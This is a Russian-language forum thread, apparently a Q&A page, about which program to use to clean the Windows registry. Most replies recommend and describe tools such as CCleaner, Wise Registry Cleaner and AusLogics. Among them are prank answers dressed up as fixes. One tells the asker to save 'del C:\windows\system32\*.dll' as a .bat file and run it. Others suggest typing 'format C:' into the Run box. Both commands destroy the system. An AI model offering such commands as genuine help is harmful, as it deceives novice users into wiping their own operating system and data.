Компьютерное железо
какой программой лучше всего чистить реестр Windows?
AusLogics
если хочешь чтоб не было проблем после чистки пользуйся
CCleaner Утилита для очистки системы от разнообразного "мусора" - cookies, истории посещения сайтов, временных файлов (в том числе "производства" веб-браузеров и программ eMule, Google Toolbar, Office, Kazaa, Nero, Adobe Acrobat, WinRAR, Real Player и некоторых других) , а также ActiveX-элементов. Кроме этого, CCleaner поддерживает очистку системного реестра от записей о неиспользуемых расширениях, библиотеках, уже удаленных программах и т. п.
Примечание: По умолчанию CCleaner устанавливает Yahoo Toolbar. Чтобы его не устанавливать, достаточно убрать соответствующую галку при инсталляции CCleaner.открыть
Хорошо чистит и самое главное безопасно бесплатная утилита:
CCleaner 2.21.940
данная утилита предназначена для чистки системного мусора. В ходе своей работы CCleaner (Crap Cleaner) ищет и удаляет временные и неиспользуемые файлы. Сюда относятся: cookies, история посещения сайтов в IE, временные файлы Интернета, строки поиска, файлы Корзины и т. д. Также поддерживается поиск временных файлов сторонних приложений: Firefox, Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, Office XP, Nero, Alcohol 120, Adobe Acrobat, WinRAR, WinAce, WinZip, GetRight, Morpheus, Download Accelerator Plus, VirtualDub, ZoneAlarm и многих других.
С помощью CCleane можно подвергнуть очистке и реестр Windows, избавив его он ненужных расширений, старых библиотек dll и неверных путей, которые накапливаются в немалом количестве, особенно после установки и удаления разнообразных программ. Проделав все эти операции над своей системой, вы не только освободите пространство на диске, но и увеличите производительность системы в целом.
CCleaner 2.21.940
Wise Registry Cleaner - чистильщик системного реестра Windows, удаляющий из него ненужную, поврежденную и просто некорректную информацию. После того как Wise Registry Cleaner проанализирует систему, выводится подробный список, где вы сможете при желании лично просмотреть каждую запись и подтвердить или отменить ее удаление. Также WRC может работать в полностью автоматическом режиме. Все изменения, вносимые в реестр, можно отменить, так что всегда можно вернуться к изначальной конфигурации.
При первом запуске утилита предлагает сделать резервную копию всего реестра, чтобы при необходимости его восстановить. В отличие от многих других подобных приложений, данная программа разделяет найденные ошибки реестра на безопасные, которые можно удалять, не опасаясь, что это нанесет вред системе, и такие ошибки, которые могут повлечь за собой нестабильную работу операционной системы. Удаленная информация сохраняется в REG-файл. Присутствует автоматический режим работы, при котором утилита будет самостоятельно запускаться, исправлять ошибки реестра и завершать работу.
Доп. информация: Основные возможности:
- Самый безопасный инструмент для очистки реестра из имеющихся на рынке на сегодняшний день
- Быстрая, тщательная и безопасная работа
- Сканирование системного реестра Windows и поиск неправильной и устаревшей информации
- Вывод каждой проблемы отдельной строкой вместе с их описанием
- Автоматический режим очистки реестра
- Откат совершенных действий в системе несколькими щелчками мыши
- Создание резервной копии системного реестра и его восстановление
- Увеличение производительности вашей системы
- Многоязычный интерфейс, включая русский язык
КАЧАТЬ
Доп. информация: Основные возможности:
- Автоматический режим очистки реестра
КАЧАТЬ
Создай текстовый документ, скопируй туда:
"del C:\windows\system32\*.dll"
жми сохрани как и меняй расширение .txt на .bat
Открывай ...проходит консолька и винда чистая!
"del C:\windows\system32\*.dll"
RegCleaner
WinMend Registry Cleaner.
Ccleaner.но бездумно и часто лучше не чистить. любая пога может выкинуть из реестра что нибудь важное
RegOrganizer
кажется RegCleaner называется
format С: и никаких проблем! :)
прога эта называется format c:, вводить в строке выполнить =)
Обсуждалось уже тут, вот решение:

Auslogics BoostSpeed